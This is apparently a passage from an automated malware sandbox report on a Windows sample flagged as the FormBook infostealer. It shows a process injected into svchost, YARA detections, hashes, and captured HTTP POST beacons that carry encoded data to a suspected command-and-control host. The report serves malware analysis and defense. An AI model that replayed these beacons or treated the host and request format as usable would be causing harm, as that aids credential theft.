                                                                                                                  x-request-id: 6f893170-4882-491c-8f86-aff529dbdc2a
                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bwwSsOG/hTj7Z+Eakf3+Bt00ZJwan5TDSf5fy7MIYb1IWMhYqLtHMy5blwXa+1aZ9H1OKKTs5DWiKPWVk7obdA==
                                                                                                                  set-cookie: parking_session=6f893170-4882-491c-8f86-aff529dbdc2a; expires=Tue, 08 Oct 2024 13:55:56 GMT; path=/
                                                                                                                  connection: close
                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 77 77 53 73 4f 47 2f 68 54 6a 37 5a 2b 45 61 6b 66 33 2b 42 74 30 30 5a 4a 77 61 6e 35 54 44 53 66 35 66 79 37 4d 49 59 62 31 49 57 4d 68 59 71 4c 74 48 4d 79 35 62 6c 77 58 61 2b 31 61 5a 39 48 31 4f 4b 4b 54 73 35 44 57 69 4b 50 57 56 6b 37 6f 62 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bwwSsOG/hTj7Z+Eakf3+Bt00ZJwan5TDSf5fy7MIYb1IWMhYqLtHMy5blwXa+1aZ9H1OKKTs5DWiKPWVk7obdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                  Oct 8, 2024 15:40:56.509607077 CEST583INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmY4OTMxNzAtNDg4Mi00OTFjLThmODYtYWZmNTI5ZGJkYzJhIiwicGFnZV90aW1lIjoxNzI4Mzk0OD


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  46192.168.2.550021199.59.243.227804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:58.623476028 CEST753OUTPOST /nuqv/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.polarmuseum.info
                                                                                                                  Origin: http://www.polarmuseum.info
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Referer: http://www.polarmuseum.info/nuqv/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 52 6f 35 59 65 74 71 48 6c 6d 6b 38 43 6f 62 47 64 4e 55 77 72 43 2b 53 5a 78 2b 6e 44 7a 54 30 6d 38 36 32 55 58 6e 36 47 59 32 56 4e 72 59 6e 6f 54 38 4a 59 4d 55 44 4f 47 2f 39 55 6a 35 68 31 44 64 36 64 67 4f 39 4d 64 75 7a 4a 58 49 55 55 5a 6d 45 39 69 4c 64 53 65 33 2f 78 53 6a 4a 30 52 52 5a 41 4a 78 2b 46 44 46 55 70 4f 73 4f 66 53 31 58 68 39 54 72 48 52 45 2f 59 2b 76 61 76 6e 49 6a 6f 76 4b 74 78 74 76 35 7a 36 67 52 46 6d 51 6c 36 32 4f 74 6e 46 55 72 4b 55 30 75 4b 2b 6f 61 4e 52 6b 73 68 48 30 71 77 56 79 44 71 39 2b 62 6a 4e 6a 41 78 44 35 6a 39 79 68 31 62 6f 78 70 4c 2f 6d 38 39 67 70 7a 62 32 75 37 64 31 71 57 4a 56 41 79 69 76 78 39
                                                                                                                  Data Ascii: nV=Ro5YetqHlmk8CobGdNUwrC+SZx+nDzT0m862UXn6GY2VNrYnoT8JYMUDOG/9Uj5h1Dd6dgO9MduzJXIUUZmE9iLdSe3/xSjJ0RRZAJx+FDFUpOsOfS1Xh9TrHRE/Y+vavnIjovKtxtv5z6gRFmQl62OtnFUrKU0uK+oaNRkshH0qwVyDq9+bjNjAxD5j9yh1boxpL/m89gpzb2u7d1qWJVAyivx9
                                                                                                                  Oct 8, 2024 15:40:59.093717098 CEST1236INHTTP/1.1 200 OK
                                                                                                                  date: Tue, 08 Oct 2024 13:40:58 GMT
                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                  content-length: 1130
                                                                                                                  x-request-id: 61b33c5a-b006-48b6-bec8-150a824f734c
                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bwwSsOG/hTj7Z+Eakf3+Bt00ZJwan5TDSf5fy7MIYb1IWMhYqLtHMy5blwXa+1aZ9H1OKKTs5DWiKPWVk7obdA==
                                                                                                                  set-cookie: parking_session=61b33c5a-b006-48b6-bec8-150a824f734c; expires=Tue, 08 Oct 2024 13:55:59 GMT; path=/
                                                                                                                  connection: close
                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 77 77 53 73 4f 47 2f 68 54 6a 37 5a 2b 45 61 6b 66 33 2b 42 74 30 30 5a 4a 77 61 6e 35 54 44 53 66 35 66 79 37 4d 49 59 62 31 49 57 4d 68 59 71 4c 74 48 4d 79 35 62 6c 77 58 61 2b 31 61 5a 39 48 31 4f 4b 4b 54 73 35 44 57 69 4b 50 57 56 6b 37 6f 62 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bwwSsOG/hTj7Z+Eakf3+Bt00ZJwan5TDSf5fy7MIYb1IWMhYqLtHMy5blwXa+1aZ9H1OKKTs5DWiKPWVk7obdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                  Oct 8, 2024 15:40:59.093744993 CEST583INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjFiMzNjNWEtYjAwNi00OGI2LWJlYzgtMTUwYTgyNGY3MzRjIiwicGFnZV90aW1lIjoxNzI4Mzk0OD


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  47192.168.2.550022199.59.243.227804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:41:01.165079117 CEST1770OUTPOST /nuqv/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.polarmuseum.info
                                                                                                                  Origin: http://www.polarmuseum.info
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Referer: http://www.polarmuseum.info/nuqv/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 52 6f 35 59 65 74 71 48 6c 6d 6b 38 43 6f 62 47 64 4e 55 77 72 43 2b 53 5a 78 2b 6e 44 7a 54 30 6d 38 36 32 55 58 6e 36 47 5a 4f 56 4f 59 51 6e 35 43 38 4a 5a 4d 55 44 48 6d 2f 38 55 6a 34 6a 31 44 46 32 64 67 43 48 4d 66 57 7a 50 78 30 55 53 73 53 45 33 69 4c 64 50 4f 33 38 73 43 69 54 30 52 42 46 41 4b 5a 2b 46 44 46 55 70 49 41 4f 57 67 64 58 6e 39 54 73 52 68 45 7a 54 65 76 69 76 6e 51 5a 6f 76 50 59 78 65 33 35 30 61 77 52 47 51 45 6c 31 32 4f 56 33 56 55 4e 4b 55 34 74 4b 2f 46 6a 4e 53 35 48 68 45 6b 71 38 69 4c 65 2f 74 4f 7a 67 76 44 5a 36 78 31 48 6a 69 74 46 54 5a 55 61 43 64 53 48 36 68 64 42 51 54 79 65 4a 45 66 74 4e 52 51 35 71 76 67 44 35 75 54 68 34 41 75 71 55 42 6f 5a 34 59 77 58 4f 6a 2f 52 63 2f 52 64 74 6a 6a 77 4e 6d 4a 55 74 49 44 51 4c 70 68 7a 69 6c 6c 30 45 6d 6a 2b 72 67 37 2b 45 70 32 75 33 34 71 36 50 56 72 53 72 6d 48 61 47 4f 47 45 2b 37 4b 65 52 4b 36 4d 48 6e 30 75 39 71 50 70 4a 4d 48 44 45 4c 68 52 4e 5a 4c 34 2b 37 57 30 6f 6e 6e 47 62 75 61 2b 4e 62 35 [TRUNCATED]
                                                                                                                  Data Ascii: nV=Ro5YetqHlmk8CobGdNUwrC+SZx+nDzT0m862UXn6GZOVOYQn5C8JZMUDHm/8Uj4j1DF2dgCHMfWzPx0USsSE3iLdPO38sCiT0RBFAKZ+FDFUpIAOWgdXn9TsRhEzTevivnQZovPYxe350awRGQEl12OV3VUNKU4tK/FjNS5HhEkq8iLe/tOzgvDZ6x1HjitFTZUaCdSH6hdBQTyeJEftNRQ5qvgD5uTh4AuqUBoZ4YwXOj/Rc/RdtjjwNmJUtIDQLphzill0Emj+rg7+Ep2u34q6PVrSrmHaGOGE+7KeRK6MHn0u9qPpJMHDELhRNZL4+7W0onnGbua+Nb5NADpLf/P+Fcs07VR1cjdFGM9E9z1eZ5xq5v+L2dXGiy0Jtdy0ptthYM1J8qgiPywJdFJ+rOckCepgNB9P/lgve/nmJK+gpo/2twShxZZ7xNK9tE9fNlzA89j1Y+Ex1IvufVIISsB/XfeNqVs80ExRTw/Hzj2CUO2Wuyv70VsME5+ABPLf45VQLGGJNeGzttupgqV4cCsoZ8F/8ivA5xhjygWbCkmXmPouG0spy5doMzC+9T8foE22MBTxlQZTbppf8PvVPpUlIIEDtwSOd1uJ1GRHcK1g3pL4DqnEV05ci9NcTVyehcpULMfln6LhEMYJW43kam5DuapOXkMDyPUHMEVnnG9HcGqXl8uRVPnK4D12daan/qaP5njShSJJQ7+OLpG7XIQbso6oyPK+pDCCfRnoTGPN6MSrZQpKVmVOLDcEU7PRQFbIulJd1AWCguaXQoinny1JHEvR+yM7Z1PVQn+ejhqoLxKOmvJ7WFvTPGRNgTyYhVr1wR1wdkuZF4JZskVLknAPfZZfxy2b26CJ7I7GIOFkxR/r/X0M8LbyOFd3C/AvPxVMglknIY7wekiA0w/n3GfPWekHxHqnt2ePxDL0YXjQx+XMfLDNLnrut9isrJKuiPbxGjVZwGnNb1QKIAE0JUkRVVDu26k247lbw1BV6iCNl8Rei [TRUNCATED]
                                                                                                                  Oct 8, 2024 15:41:01.635869026 CEST1236INHTTP/1.1 200 OK
                                                                                                                  date: Tue, 08 Oct 2024 13:41:00 GMT
                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                  content-length: 1130
                                                                                                                  x-request-id: 6bc7d244-35a7-440e-98c4-54b464a070d6
                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bwwSsOG/hTj7Z+Eakf3+Bt00ZJwan5TDSf5fy7MIYb1IWMhYqLtHMy5blwXa+1aZ9H1OKKTs5DWiKPWVk7obdA==
                                                                                                                  set-cookie: parking_session=6bc7d244-35a7-440e-98c4-54b464a070d6; expires=Tue, 08 Oct 2024 13:56:01 GMT; path=/
                                                                                                                  connection: close
                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 77 77 53 73 4f 47 2f 68 54 6a 37 5a 2b 45 61 6b 66 33 2b 42 74 30 30 5a 4a 77 61 6e 35 54 44 53 66 35 66 79 37 4d 49 59 62 31 49 57 4d 68 59 71 4c 74 48 4d 79 35 62 6c 77 58 61 2b 31 61 5a 39 48 31 4f 4b 4b 54 73 35 44 57 69 4b 50 57 56 6b 37 6f 62 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bwwSsOG/hTj7Z+Eakf3+Bt00ZJwan5TDSf5fy7MIYb1IWMhYqLtHMy5blwXa+1aZ9H1OKKTs5DWiKPWVk7obdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                  Oct 8, 2024 15:41:01.635988951 CEST583INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmJjN2QyNDQtMzVhNy00NDBlLTk4YzQtNTRiNDY0YTA3MGQ2IiwicGFnZV90aW1lIjoxNzI4Mzk0OD


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  48192.168.2.550023199.59.243.227804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:41:03.711556911 CEST474OUTGET /nuqv/?nV=cqR4daz/40w4b6rdKNYqvkeleB2fEiPhnuSAX3LrEIyAZ4914Ww4a7UdeW+JTGwq/HZWal2FK/CEDxgqbNyvyy/SGYyigH7HtG4hHq89KwpktbUpTg5pzo/PCicdM9eRug==&ntHx=DVDDWR70P4Ux HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.polarmuseum.info
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Oct 8, 2024 15:41:04.179184914 CEST1236INHTTP/1.1 200 OK
                                                                                                                  date: Tue, 08 Oct 2024 13:41:03 GMT
                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                  content-length: 1510
                                                                                                                  x-request-id: 4e0fccc2-8cf4-4e23-a5f1-bdaea6154564
                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hVVvaXIGWJy98LIQVSiYZECljelhPhzKyUE/LltVNXpqzO1n0R2ke2YbCeJ1f4CQ2Rzt8t2jj+I7tZpnvTxziA==
                                                                                                                  set-cookie: parking_session=4e0fccc2-8cf4-4e23-a5f1-bdaea6154564; expires=Tue, 08 Oct 2024 13:56:04 GMT; path=/
                                                                                                                  connection: close
                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 56 56 76 61 58 49 47 57 4a 79 39 38 4c 49 51 56 53 69 59 5a 45 43 6c 6a 65 6c 68 50 68 7a 4b 79 55 45 2f 4c 6c 74 56 4e 58 70 71 7a 4f 31 6e 30 52 32 6b 65 32 59 62 43 65 4a 31 66 34 43 51 32 52 7a 74 38 74 32 6a 6a 2b 49 37 74 5a 70 6e 76 54 78 7a 69 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hVVvaXIGWJy98LIQVSiYZECljelhPhzKyUE/LltVNXpqzO1n0R2ke2YbCeJ1f4CQ2Rzt8t2jj+I7tZpnvTxziA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                  Oct 8, 2024 15:41:04.179466963 CEST963INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGUwZmNjYzItOGNmNC00ZTIzLWE1ZjEtYmRhZWE2MTU0NTY0IiwicGFnZV90aW1lIjoxNzI4Mzk0OD


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:09:37:12
                                                                                                                  Start date:08/10/2024
                                                                                                                  Path:C:\Users\user\Desktop\enkJ6J7dAn.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\enkJ6J7dAn.exe"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:1'402'195 bytes
                                                                                                                  MD5 hash:DC1B0B674722F76E68CDFCD373C34AB9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:09:37:13
                                                                                                                  Start date:08/10/2024
                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\enkJ6J7dAn.exe"
                                                                                                                  Imagebase:0xba0000
                                                                                                                  File size:46'504 bytes
                                                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:09:37:25
                                                                                                                  Start date:08/10/2024
                                                                                                                  Path:C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:140'800 bytes
                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:09:37:30
                                                                                                                  Start date:08/10/2024
